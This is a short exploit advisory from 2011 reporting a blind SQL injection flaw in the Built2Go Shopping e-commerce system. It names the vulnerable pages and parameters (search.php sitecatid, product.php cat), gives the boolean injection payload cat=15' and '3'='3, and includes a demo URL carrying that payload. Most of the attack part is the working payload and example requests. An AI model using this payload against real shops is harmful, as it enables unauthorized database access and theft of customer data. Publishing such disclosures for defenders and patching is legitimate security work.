# Exploit Title: Built2Go Shopping (E-Commerce System) Blind SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

Blind SQL Injection can be done using the command input

Vulnerable Page:
search.php
product.php

Example:
search.php?searchword=&sitecatid=<Blind SQL Injection>
product.php?cat=<Blind SQL Injection>

Exploit:
cat=15' and '3'='3

Demo:
http://demos.built2go.com/shopping/1/product.php?cat=15%27%20and%20%273%27=%273


Thanks,


Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr